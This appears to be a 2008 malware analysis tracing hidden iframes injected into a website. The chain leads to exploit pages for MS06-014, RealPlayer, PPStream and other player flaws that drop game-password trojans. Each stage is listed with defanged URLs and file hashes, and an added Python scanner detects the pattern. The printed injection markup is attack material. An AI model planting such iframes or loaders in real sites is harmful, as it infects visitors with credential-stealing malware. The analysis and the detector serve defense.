Trojans: Rootkit.win32.mnless, Trojan.win32.edog, etc.



Endurer, original
2008-02-02, version 1

IE stopped responding after the website was opened.

Code found at the bottom of the homepage:
/---
<iframe src="hxxp://8**8.8*812**15.com/88.htm" width=0 height=0></iframe>
---/

1 hxxp://8**8.8*812**15.com/88.htm
Code included:
/---
<iframe src="hxxp://8***8.8*812***15.com/in.htm" width=0 height=0></iframe>
<iframe src="hxxp://ga**.mm*52**08.com/20.htm" width=0 height=0></iframe>
<iframe src="hxxp://d**v.5**51*89.net/" width=0 height=0></iframe>
<iframe src="hxxp://a*1**.sb**b2*2.com/a.htm" width=0 height=0></iframe>
<iframe src="hxxp://s*f*.07**08*08.net/sf.htm" width=0 height=0></iframe>
---/

1.1 hxxp://8**8.8*812**15.com/in.htm
Code included:
/---
<iframe src="hxxp://y**un.y**un8**78.com/web/6620.38.htm" width=100 height=0></iframe>
---/

1.1.1 hxxp://y**un.y**un8**78.com/web/6620.38.htm
Code included (the src value is reconstructed from the URL traced in 1.1.1.1 below):
/---
<iframe src="hxxp://y**un.y**un8**78.com/web/htm.html" width=100 height=0></iframe>
---/

1.1.1.1 hxxp://y**un.y**un8**78.com/web/htm.html
Output code:
/---
<script src="hxxp://y**un.y**un8**78.com/web/1.js"></script>
<script src="hxxp://y**un.y**un8**78.com/web/bf.js"></script>
<script src="hxxp://y**un.y**un8**78.com/web/pps.js"></script>
<iframe width='10' height='10' src='hxxp://y**un.y**un8**78.com/web/3.htm'></iframe>
<script src="hxxp://y**un.y**un8**78.com/web/pps.js"></script>
<iframe width='000000' height='0' src='hxxp://y**un.y**un8**78.com/web/2.htm'></iframe>
<iframe width=100 height=0 src="hxxp://y**un.y**un8**78.com/web/0.htm"></iframe>
---/

1.1.1.1.1 hxxp://y**un.y**un8**78.com/web/1.js
Downloads hxxp://y**un.y**un8**78.com/14.exe via the MS06-014 critical vulnerability (msadco.dll).

File Description: D:/test/14.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time: 17:15:21
Size: 9728 bytes, 9.512 KB
MD5: b64fac1da0efbbc479486fefa269cf39
Sha1: 35e62825704027baa6dc0d7089857d10986fbd71
CRC32: 8e086454

Kaspersky: Trojan-PSW.Win32.OnLineGames.pik; Rising: Trojan.DL.win32.undef.W

1.1.1.1.2 hxxp://y**un.y**un8**78.com/web/bf.js

Downloads hxxp://y**un.y**un8**78.com/bf.exe via the Storm (Baofeng) media player vulnerability.

File Description: D:/test/bf.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:15:57
Modification time: 17:15:57
Access time: 17:16:24
Size: 23886 bytes, 23.334 KB
MD5: a20a230c7e2e1f93bc659aa9fa1ed3d1
Sha1: 8fe260c3a6a971d339b2ea170283c13f4faade87
CRC32: 13eb41fd

Kaspersky: Trojan-PSW.Win32.OnLineGames.ode; Rising: Trojan.DL.win32.undef.W, Rootkit.win32.mnless.GP

1.1.1.1.3 hxxp://y**un.y**un8**78.com/web/pps.js
Uses the PPStream vulnerability to download hxxp://y**un.y**un8**78.com/pps.exe

pps.exe is identical to bf.exe.

1.1.1.1.4 Uses the Baidu Toolbar (BaiduBar.Tool) vulnerability to download hxxp://y**un.y**un8**78.com/ad.cab
ad.cab is a cabinet package containing bd.exe.
bd.exe is identical to bf.exe.

1.1.1.1.5 hxxp://y**un.y**un8**78.com/web/3.htm
Downloads hxxp://y**un.y**un8**78.com/g.exe via the Lianzhong (Ourgame) GLChat.ocx vulnerability.
g.exe is identical to bf.exe.

1.1.1.1.6 hxxp://y**un.y**un8**78.com/web/2.htm
RealPlayer vulnerability exploit code. One of its lines is: payload += "yuange";

1.1.1.1.7 hxxp://y**un.y**un8**78.com/web/0.htm
Uses the QvodPlayer vulnerability to download hxxp://y**un.y**un8**78.com/me.exe
me.exe is identical to bf.exe.

1.2 hxxp://ga**.mm*52**08.com/20.htm

Code included:
/---
<iframe src="hxxp://3**75*86.com/uu/web.htm" width=100 height=0></iframe>
---/

1.2.1 hxxp://3***75*86.com/uu/web.htm

Code included (src values reconstructed from the URLs traced in 1.2.1.1 and 1.2.1.2 below):
/---
<iframe src="hxxp://3**75*86.com/uu/r.htm" width=10 height=0></iframe>
<iframe src="hxxp://3**75*86.com/uu/index.htm" width=10 height=0></iframe>
---/

1.2.1.1 hxxp://3**75*86.com/uu/r.htm
RealPlayer vulnerability exploit code. One of its lines is: xcbfcxn += "Lizhen";

1.2.1.2 hxxp://3**75*86.com/uu/index.htm
Output code (src values reconstructed from the URLs traced in 1.2.1.2.1 to 1.2.1.2.4 below):
/---
<iframe src="hxxp://3***75*86.com/uu/06014.html"></iframe>
<script src="hxxp://3**75*86.com/uu/bf.gif"></script>
<script src="hxxp://3***75*86.com/uu/pps.gif"></script>
<script src="hxxp://3**75*86.com/uu/lz.gif"></script>
---/

1.2.1.2.1 hxxp://3***75*86.com/uu/06014.html
Downloads hxxp://3**75*86.com/uu/uuu.exe via the MS06-014 critical vulnerability (msadco.dll) and saves it as quit.exe.

File Description: D:/test/uuu.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:27:20
Modification time: 17:27:20
Access time: 17:27:30
Size: 19476 bytes, 19.20 KB
MD5: 9eaf1e6e1986170ffdcfae05852f5d0e
Sha1: 4b55206aab215f1e09e9442988da5b7c61716fa9
CRC32: 3177b317

1.2.1.2.2 hxxp://3**75*86.com/uu/bf.gif
Downloads hxxp://3**75*86.com/uu/uuu.exe via the Storm (Baofeng) media player vulnerability.

1.2.1.2.3 hxxp://3**75*86.com/uu/lz.gif
Downloads hxxp://3**75*86.com/uu/uuu.exe via the Lianzhong (Ourgame) GLChat.ocx vulnerability.

1.2.1.2.4 hxxp://3***75*86.com/uu/pps.gif
Uses the PPStream vulnerability to download hxxp://3**75*86.com/uuu/uuu.exe

1.3 hxxp://d**v.5**51*89.net/

Code included:
/---
<iframe src="hxxp://ppp.bu*ya**oni**.com/ww/new82.htm" width=1 height=1></iframe>
---/

1.3.1 hxxp://ppp.bu*ya**oni**.com/ww/new82.htm
Code included:
/---
<iframe src="hxxp://ppp.bu*ya**oni**.com/dm/diao.htm" width=1 height=1></iframe>
<iframe src="hxxp://ppp.bu*ya**oni**.com/dm/rl.htm" width=1 height=1></iframe>
<iframe src="hxxp://ppp.bu*ya**oni**.com/dm/rr.htm" width=1 height=1></iframe>
---/

1.3.1.1 hxxp://ppp.bu*ya**oni**.com/dm/diao.htm
Output code:
/---
<script src="hxxp://ppp.bu*ya**oni**.com/dm/11.js"></script>
<script src="hxxp://ppp.bu*ya**oni**.com/dm/bb.js"></script>
<script src="hxxp://ppp.bu*ya**oni**.com/dm/pp.js"></script>
<script src="hxxp://ppp.bu*ya**oni**.com/dm/pp.js"></script>
---/

1.3.1.1.1 hxxp://ppp.bu*ya**oni**.com/dm/11.js
Downloads hxxp://dd.749571.com/bb/014.exe via the MS06-014 critical vulnerability (msadco.dll) and saves it as ntuser.com.

File Description: D:/test/014.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 12272 bytes, 11.1008 KB
MD5: f12f5cb120648999c40ef8a617efd8da
Sha1: 881d4cf70f5a9a77df37438c826e00fc3fc619d6
CRC32: f6a07465

Kaspersky: Trojan-Downloader.Win32.Agent.ine; Rising: Trojan.DL.win32.mnless.XR

1.3.1.1.2 hxxp://ppp.bu*ya**oni**.com/dm/bb.js
Downloads hxxp://dd.749571.com/bb/bb.exe
bb.exe is identical to 014.exe.

1.3.1.1.3 hxxp://ppp.bu*ya**oni**.com/dm/pp.js
Uses the PPStream vulnerability to download hxxp://dd.749571.com/bb/pp.exe
pp.exe is identical to 014.exe.

1.3.1.1.4 Uses the Baidu Toolbar (BaiduBar.Tool) vulnerability to download hxxp://dd.749571.com/bb/bd.cab
Contains the file bd.exe.
bd.exe is identical to 014.exe.

1.3.1.2 hxxp://ppp.bu*ya**oni**.com/dm/rl.htm
RealPlayer vulnerability exploit code. One of its lines is: xcbfcxn += "Lizhen";

1.3.1.3 hxxp://ppp.bu*ya**oni**.com/dm/rr.htm
Downloads hxxp://is.749571.com/bb/a.exe via the Lianzhong (Ourgame) GLChat.ocx vulnerability.
a.exe could not be downloaded.

1.4 hxxp://a*1**.sb**b2*2.com/a.htm
Code included:
/---
<iframe src="hxxp://xxx.j**sp**p*p.us/dgll1.htm?Id=TT" width=100 height=0></iframe>
---/

1.4.1 hxxp://xxx.j**sp**p*p.us/dgll1.htm?Id=TT
Output code:
/---
<iframe width=100 height=1 frameborder=0 scrolling=no src="Ceshi/real.htm"></iframe>
<iframe width=100 height=1 frameborder=0 scrolling=no src="Ceshi/lz.htm"></iframe>
<iframe width=100 height=1 frameborder=0 scrolling=no src="Ceshi/614.htm"></iframe>
---/

1.4.1.1 hxxp://xxx.j**sp**p*p.us/Ceshi/real.htm
RealPlayer vulnerability exploit code. One of its lines is: xcbfcxn += "Lizhen";

1.4.1.2 hxxp://xxx.j**sp**p*p.us/Ceshi/lz.htm
Downloads hxxp://xxx.j**sp**p*p.us/ww/dod.exe using US-ASCII-encoded exploit code for the Lianzhong (Ourgame) GLChat.ocx vulnerability.

File Description: D:/test/dod.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:39:25
Modification time: 17:39:25
Access time: 17:39:38
Size: 12248 bytes, 11.984 KB
MD5: d7da77be93072171fa1e6778655e37da
Sha1: 74ea3b71ab6953a231e914b3592ded61de4c198b
CRC32: ca260cda

Kaspersky: Trojan-Downloader.Win32.Agent.iga; Rising: Trojan.DL.win32.mnless.XR

1.4.1.3 hxxp://xxx.j**sp**p*p.us/Ceshi/614.htm
Downloads hxxp://xxx.j**sp**p.us/ww/dod.exe via the MS06-014 critical vulnerability (msadco.dll).

1.5 hxxp://s*f*.07**08*08.net/sf.htm
Code included:
/---
<iframe src="hxxp://xxx.a**omi*ba**.com/index888.htm?F8?001" width=0 height=0></iframe>
---/

1.5.1 hxxp://xxx.a**omi*ba**.com/index888.htm?F8?001
Output code:
/---
<script src="hxxp://xxx.a**omi*ba**.com/ajax.gif"></script>
<iframe width='0' height='0' src='hxxp://xxx.a**omi*ba**.com/ms06014.htm'></iframe>
<script src="hxxp://xxx.a**omi*ba**.com/real.js"></script>
<script src="hxxp://xxx.a**omi*ba**.com/bfyy.gif"></script>
<script src="hxxp://xxx.a**omi*ba**.com/pps.gif"></script>
<script src="hxxp://xxx.a**omi*ba**.com/xunlei.gif"></script>
<script src="hxxp://xxx.a**omi*ba**.com/lz.gif"></script>
<iframe width='0' height='0' src='hxxp://xxx.a**omi*ba**.com/qvod.html'></iframe>
---/

1.5.1.1 hxxp://xxx.a**omi*ba**.com/ajax.gif
Downloads hxxp://xxx.a**omi*ba**.com/xxx.exe via the MS06-014 critical vulnerability (msadco.dll).

File Description: D:/test/xxx.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:43:58
Modification time: 17:43:59
Access time:
Size: 12288 bytes, 12.0 KB
MD5: ebea634c297a18c2ff5dbc72841e178a
Sha1: cc2a9a901dc5b2f3e513e2370d008defb00f094a
CRC32: 252b48da

Kaspersky: Trojan-PSW.Win32.OnLineGames.qgh; Rising: Trojan.win32.edog.j

1.5.1.2 hxxp://xxx.a**omi*ba**.com/ms06014.htm
Downloads hxxp://xxx.a**omi*ba**.com/xxx.exe via the MS06-014 critical vulnerability (msadco.dll).

1.5.1.3 hxxp://xxx.a**omi*ba**.com/real.js
Uses the RealPlayer vulnerability to download hxxp://xxx.a**omi*ba**.com/xxx.exe

1.5.1.4 hxxp://xxx.a**omi*ba**.com/bfyy.gif
Downloads hxxp://xxx.a**omi*ba**.com/xxx.exe

1.5.1.5 hxxp://xxx.a**omi*ba**.com/pps.gif
Uses the PPStream vulnerability to download hxxp://xxx.a**omi*ba**.com/xxx.exe

1.5.1.6 hxxp://xxx.a**omi*ba**.com/xunlei.gif
Uses the Xunlei (Thunder) vulnerability to download hxxp://xxx.a**omi*ba**.com/xxx.exe

1.5.1.7 hxxp://xxx.a**omi*ba**.com/lz.gif
Downloads hxxp://xxx.a**omi*ba**.com/xxx.exe via the Lianzhong (Ourgame) GLChat.ocx vulnerability.

1.5.1.8 hxxp://xxx.a**omi*ba**.com/qvod.html
Uses the QvodPlayer vulnerability to download hxxp://xxx.a**omi*ba**.com/xxx.exe
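As an added example that is not part of Endurer's trace, the following Python check is one a site owner or responder could run over a page to flag the two tell-tales that recur throughout this chain: iframes at zero or near-zero size pointing at other hosts, and script elements whose src ends in an image name such as .gif. The sample page and every host name in it are constructed placeholders.

```python
# Added example (not from the original writeup): flag the injection pattern seen in the trace.
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_PX = 10  # 0x0, 1x1 and 10x10 frames in the trace all fall at or under this
NON_SCRIPT_EXT = (".gif", ".jpg", ".png", ".htm", ".html")

def _px(value):
    """Parse width/height; '000000' -> 0, missing or non-numeric -> large (not hidden)."""
    digits = "".join(ch for ch in (value or "") if ch.isdigit())
    return int(digits) if digits else 10**6

class InjectScanner(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []  # (kind, host, src)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser lower-cases tag and attribute names
        src = a.get("src", "").strip()
        if not src:
            return
        host = (urlparse(src).hostname or self.page_host).lower()  # relative src -> same host
        hidden = _px(a.get("width")) <= HIDDEN_PX or _px(a.get("height")) <= HIDDEN_PX
        if tag == "iframe" and hidden:
            self.findings.append(("hidden-iframe", host, src))
        elif tag == "script" and host != self.page_host:
            # loaders in the trace were served as .gif; the browser still runs them as JavaScript
            kind = "script-as-image" if src.lower().endswith(NON_SCRIPT_EXT) else "remote-script"
            self.findings.append((kind, host, src))

def scan(html, page_host):
    """Return a list of (kind, host, src) findings for one page served from page_host."""
    p = InjectScanner(page_host)
    p.feed(html)
    p.close()
    return p.findings

# Constructed sample mirroring the shape of the injected code; hosts are placeholders.
SAMPLE = """<html><body><p>normal page content</p>
<iframe src="http://landing.example/88.htm" width=0 height=0></iframe>
<script src="http://exploit.example/web/bf.gif"></script>
<iframe width='000000' height='0' src='http://exploit.example/web/2.htm'></iframe>
<iframe src="http://ads.example/banner.htm" width=300 height=250></iframe>
<script src="/js/site.js"></script></body></html>"""

if __name__ == "__main__":
    for kind, host, src in scan(SAMPLE, "www.victim.example"):
        print(f"{kind:16} {host:18} {src}")
```

The distinct hosts in the findings are the values to search for in proxy logs and to block at the edge while the injected page is cleaned.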
